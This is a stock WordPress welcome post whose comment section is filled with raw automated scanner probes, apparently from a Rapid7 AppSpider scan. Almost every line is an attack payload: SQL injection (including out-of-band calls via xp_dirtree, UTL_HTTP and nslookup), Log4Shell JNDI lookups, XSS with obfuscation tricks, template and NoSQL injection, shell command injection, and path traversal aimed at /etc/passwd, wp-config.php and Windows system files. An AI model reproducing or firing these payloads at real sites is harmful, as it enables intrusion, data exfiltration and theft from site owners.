Welcome to WordPress. This is your first post. Edit or delete it, then start writing!
4,603 Responses
Howzit, this is a comment.
To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.
Commenter avatars come from Gravatar.
comment
< /etc/passwd
/.
\.
c:\.
http://appspidered.rapid7.com/
http://appspidered.rapid7.com/
appspidered.rapid7.com/
wp-comments-post.php.
../wp-comments-post.php.
../../wp-comments-post.php.
c:\boot.ini.
c:\boot.ini
d:\boot.ini
../../../../../../boot.ini.
../../../../../../boot.ini
noexistnoexist.
../../../../../../../../../../etc/hosts.
/..
\..
c:\..
/../../../../../../../../../../..
/etc/passwd
file:/etc/passwd
file:/wp-comments-post.php
/WEB-INF/web.xml
WEB-INF/web.xml
file:WEB-INF/web.xml
/../../WEB-INF/web.xml
\WEB-INF\web.xml
/../../../../../../../../../../.
noexistnoexist
/.
/.
http://localhost/
http://localhost:22/
package.json.bak
package.json.bak
package.json.bak%00
../wp-config.php
http://appspidered.rapid7.com/rfi/x7qe2vqa
/../../../../../../../../../../vendor.js
../../../../../
..\..\..\..\..\
alert(2130165)
alert(2240775)
alert(2359578)
alert(2461992)
“>alert(2568506)
“>alert(2675014)
“>alert(2797907)
“>alert(2908516)
‘>alert(3023213)
‘>alert(3117431)
‘>alert(3232134)
‘>alert(3338644)
“>
“>
“>
“>
‘>
‘>
‘>
‘>
{constructor.constructor(4588106)}
{constructor.constructor(4776554)}
{constructor.constructor(4936320)}
{constructor.constructor(5075605)}
comment’;+exec+master..xp_dirtree+”//71915fdc1114fe51b91323662716bd60a1b350ae.oob.appspidered.rapid7.com/a”–
comment’;+SELECT+*+FROM+OPENROWSET(‘SQLOLEDB’,+’e16bf681e05bf0e47352c8c523645fd18fbf2882.oob.appspidered.rapid7.com’;’sa’;’pwd’,+’SELECT+1′)–
comment’;+SELECT+LOAD_FILE(‘\\\\1beca9a5cb51ee3a541f5c91039a4d9428a7e85b.oob.appspidered.rapid7.com\\a’)#
comment’;+SELECT+’hello’+INTO+DUMPFILE+’\\\\42b13b24fb89765e9ca0ba923c84e14dc23a2391.oob.appspidered.rapid7.com\\a’#
comment’;+copy+(SELECT+”)+to+program+’nslookup+15b20dade35096089c8a5bbf48e0b01a3d5844e0.oob.appspidered.rapid7.com’–
comment’+ORDER+BY+(CASE+WHEN+(1=0)+THEN+NULL+ELSE+UTL_HTTP.REQUEST(‘http://46542ef680073e74e3bccd5b3a1468d5b6360b0e.oob.appspidered.rapid7.com/’)+END)–
http://www.example.com/
https://example.com/
ftp://example.com/
http://example.com/
gopher://example.com/
example.com/
.example.com/
https://example.com/comment
comment” && sleep(00) && “1”!=”1
comment” && sleep(10000) && “1”!=”1
comment” && “1”==”0
comment” && “1”==”1
comment’ && ‘1’==’0
comment’ && ‘1’==’1
${applicationScope}
${requestScope}
${“asdflkj”.toString().replace(“d”,”x”)}
#{“asdflkj”.toString().replace(“d”,”x”)}
{{ 58719 * 21973 }}
{{ 62951705 + 74179523 }}
‘.phpinfo().’
*
|
comment|
&
comment&
comment)
!comment
commentcommentcomment
655321
./*][
${jndi:ldap://cc36b9e64428582894603c2fb06a8ed188437616.oob.appspidered.rapid7.${lower:COM}}
commentx7ysber5
x7zni45y'”x7zni45y
comment” && sleep(00) && “1”!=”1
comment” && “1”==”0
comment” && “1”==”1
comment’ && ‘1’==’0
comment’ && ‘1’==’1
alert(10691561)
alert(10941490)
alert(11101285)
alert(11261093)
“>alert(11424989)
“>alert(11597057)
“>alert(11781415)
“>alert(11945289)
‘>alert(12113269)
‘>alert(12268952)
‘>alert(12428728)
‘>alert(12613096)
{constructor.constructor(14919496)}
{constructor.constructor(15181669)}
{constructor.constructor(15439733)}
{constructor.constructor(15869881)}
x700i3ia<x700i3ia
x71ph2y0’x71ph2y0
x72hlfvo”x72hlfvo
x7282bo7>x7282bo7
x73y99cx
‘comment
comment’
comment”
comment’
comment%’
comment
comment%u0027
comment%27
comment”
comment%”
comment
comment%u0022
comment%22
< /etc/passwd
a
b
1e309
char(0x27)char(0x27)comment
%u2018comment
%u2019comment
%u201acomment
%u201bcomment
%u201ccomment
%u201dcomment
%u201ecomment
— comment
/*comment
commentʼ
{comment
{‘comment
{“comment
{comment
{‘comment
{“comment
comment{
comment’}
comment”}
comment}
comment’}
comment”}
comment/
comment/’
comment/”
comment/
/’comment
comment/”
comment”}, {x7d0sfax:{$meta: “textScore
comment’}, {x7ew83t9:{$meta: ‘textScore
comment”}}, {x7fruc33:{$meta: “textScore
comment’}, {x7gkj64a:{$meta: ‘textScore
*
|
comment|
&
comment&
comment)
!comment
${jndi:ldap://d29ed81cb581dc18533cf4918ab19aeec16be009.oob.appspidered.rapid7.${lower:COM}}
comment$0
comment;/etc/passwd
comment|/bin/cat /etc/passwd
comment|/bin/cat /etc/passwd|
comment;/etc/hosts
comment|/bin/cat /etc/hosts
comment|/bin/cat /etc/hosts|
comment;/usr/bin/id
comment|/bin/cat /usr/bin/id
comment|/bin/cat /usr/bin/id|
type c:\boot.ini
comment&dir
comment&ipconfig
echo foobar x75as1ee
comment&& echo foobar x75zr0vt
comment| echo foobar x76tqs2b
comment| echo foobar x77npk8f|
comment< echo foobar x78t5u5d
netstat -na
comment&&netstat -na
comment|netstat -na
comment|netstat -na|
comment;netstat ;
comment<netstat -na
ping -h
comment&&ping -h
comment|ping -h
comment|ping -h|
comment<ping -h
$LANG
comment&&$LANG
comment|$LANG
comment|$LANG|
comment<$LANG
; free
;ping localhost -c 21;
;TIMEOUT /T 10 /NOBREAK;
comment
comment’ AND ‘1’=’0
comment’ AND ‘1’=’1
comment” AND “1”=”0
comment” AND “1”=”1
comment’ AND 1=0/*
comment’ AND 1=1/*
comment’ AND 1=0)/*
comment’ AND 1=1)/*
comment’ AND 1=0–
comment’ AND 1=1–
comment’ AND 1=0)–
comment”) AND (“1″”=”1
comment’ AND 1=0 LIMIT 1–
comment’ AND 1=1 LIMIT 1–
REPEAT(0x636f6d6d656e74,2)
REPEAT(0x636f6d6d656e74,1)
comment OR 1=1
comment OR 1=0
comment’ OR ‘1’=’1
comment’ OR ‘1’=’0
comment” OR “1”=”1
comment” OR “1”=”0
comment’) OR (‘1’=’1
comment’) OR (‘1’=’0
comment”) OR (“1″=”1
comment”) OR (“1″=”0
comment’ OR 1=1 ##
comment’ OR 1=0 ##
comment’ OR 1=1 —
comment’ OR 1=0 —
comment’ OR ‘1’=’0
comment’ OR ‘1’=’1
comment” OR “1”=”0
comment” OR “1”=”1
comment’) OR (‘1’=’0
comment’) OR (‘1’=’1
comment”) OR (“1″=”0
comment”) OR (“1″=”1
comment’ OR 1=0 ##
comment’ OR 1=1 ##
comment’ OR 1=0 —
comment’ OR 1=1 —
comment’) AND ‘1’ in (‘0
comment’) AND ‘1’ in (‘1
comment”) AND “1” in (“0
comment”) AND “1” in (“1
comment’) OR ‘1’ in (‘0
comment’) OR ‘1’ in (‘1
comment”) OR “1” in (“0
comment”) OR “1” in (“1
comment DESC
comment ASC
1, comment DESC
1, comment ASC
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(2784810,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(13924050,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(34969075,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(34969075,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment’ and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(327380,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(404172,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(444589,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(489047,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select*from(select(sleep(05)))a) —
comment’);WAITFOR DELAY ’00:00:05′–
comment’ OR 1=1 —
comment’ OR 1=0 —
comment AND pg_sleep(00) is not null
comment AND pg_sleep(05) is not null
comment ‘;select pg_sleep(00);– –
comment ‘;select pg_sleep(05);– –
comment ;select pg_sleep(00);– –
comment ;select pg_sleep(05);– –
‘.phpinfo().’
x75vmzwf
x76nqctb
x77lfzi0: x77lfzi0
=alert(1998390)
=alert(2190930)
=alert(2403960)
=alert(2584210)
comment
comment
‘alert(3157768)
‘alert(3333931)
‘alert(3555173)
‘alert(3760063)
abc
comment”>
comment”>
comment”>
comment”>
@import’x7z3sa7r’;
@import’x70w4md7′;
@import’x71yk3ow’;
@import’x72rxeuw’;
ADw-script AD4-alert(9410659) ADw-/script AD4-
ADw-script AD4-alert(9640103) ADw-/script AD4-
+ADw-script+AD4-alert(9832756)+ADw-/script+AD4-
+ADw-script+AD4-alert(10070526)+ADw-/script+AD4-
comment’>
comment’>
comment’>
comment’>
alert`12644499`
alert`12800222`
alert`12980573`
alert`13181433`
prompt`13349477`
prompt`13546230`
prompt`13718351`
prompt`13923232`
top[‘al’ ‘ert’](14107644)
top[‘al’ ‘ert’](14300236)
top[‘al’+’ert’](14492873)
top[‘al’+’ert’](14661002)
aler\u0074(14865939);
aler\u0074(15038092);
aler\u0074(15214339);
aler\u0074(15374168);
MOUSEOVER ME
c
\”http://example.com/ ‘ onmouseover=alert(839108) ‘
\”http://example.com/ ‘ onmouseover=alert(1011308) ‘
\”http://example.com/ ‘ onmouseover=alert(1195800) ‘
\”http://example.com/ ‘ onmouseover=alert(1359773) ‘
alert(1536079)
alert(1700047)
alert(1880354)
alert(2064789)
“><img src=x onerror="alert(2265656)
“><img src=x onerror="alert(2503420)
“><img src=x onerror="alert(2741150)
“><img src=x onerror="alert(2991180)
‘comment
comment’
comment”
comment’
comment
‘comment
comment’
comment”
comment’
comment%’
comment
comment%u0027
comment%27
comment%”
comment
comment%u0022
1e309
%u2019comment
%u201bcomment
%u201ccomment
%u201dcomment
%u201ecomment
— comment
/*comment
commentʼ
comment’ UNION ALL select NULL —
comment” UNION ALL select NULL —
SELECT * FROM “master”
SELECC * FROM “ds”
comment’;+exec+master..xp_dirtree+”//568f754149069c3e186000571f7119b50800b4e1.oob.appspidered.rapid7.com/a”–
comment’;+SELECT+*+FROM+OPENROWSET(‘SQLOLEDB’,+’094e66c7d2e8c10ef3eee58a5a372c70730567ee.oob.appspidered.rapid7.com’;’sa’;’pwd’,+’SELECT+1′)–
comment’;+SELECT+LOAD_FILE(‘\\\\2a98e674e8224358ca87a03dac3bebe0578c7ec4.oob.appspidered.rapid7.com\\a’)#
comment’;+SELECT+’hello’+INTO+DUMPFILE+’\\\\fff43e879cd56facf444dcb1d141fc88bc108c87.oob.appspidered.rapid7.com\\a’#
comment’;+copy+(SELECT+”)+to+program+’nslookup+b9af6b7ef2c640fa55794be51ca19f9483b7a9ac.oob.appspidered.rapid7.com’–
comment’+ORDER+BY+(CASE+WHEN+(1=0)+THEN+NULL+ELSE+UTL_HTTP.REQUEST(‘http://dbf216a294dea09dbd2e865034fa5643aedb93b9.oob.appspidered.rapid7.com/’)+END)–
wp-comments-post.php
/etc/passwd
\WINDOWS\system32\drivers\etc\hosts
C:\WINDOWS\system32\drivers\etc\hosts
..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts
..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts.htm
wp-comments-post.php
/wp-comments-post.php
../../../../../../../../../../etc/hosts
< /etc/passwd
/.
\.
c:\.
http://appspidered.rapid7.com/
http://appspidered.rapid7.com/
appspidered.rapid7.com/
wp-comments-post.php.
../wp-comments-post.php.
../../wp-comments-post.php.
c:\boot.ini.
c:\boot.ini
d:\boot.ini
../../../../../../../../../../etc/hosts.
/etc/passwd
file:/etc/passwd
file:/wp-comments-post.php
/WEB-INF/web.xml
WEB-INF/web.xml
file:WEB-INF/web.xml
/../../WEB-INF/web.xml
\WEB-INF\web.xml
/../../../../../../../../../../.
noexistnoexist
/.
/.
http://localhost/
http://localhost:22/
package.json.bak
package.json.bak
package.json.bak%00
../wp-config.php
http://appspidered.rapid7.com/rfi/x7fawt6y
/../../../../../../../../../../vendor.js
../../../../../
..\..\..\..\..\
commentcommentcomment
655321
./*][
${applicationScope}
${requestScope}
${“asdflkj”.toString().replace(“d”,”x”)}
#{“asdflkj”.toString().replace(“d”,”x”)}
{{ 58719 * 21973 }}
{{ 62951705 + 74179523 }}
comment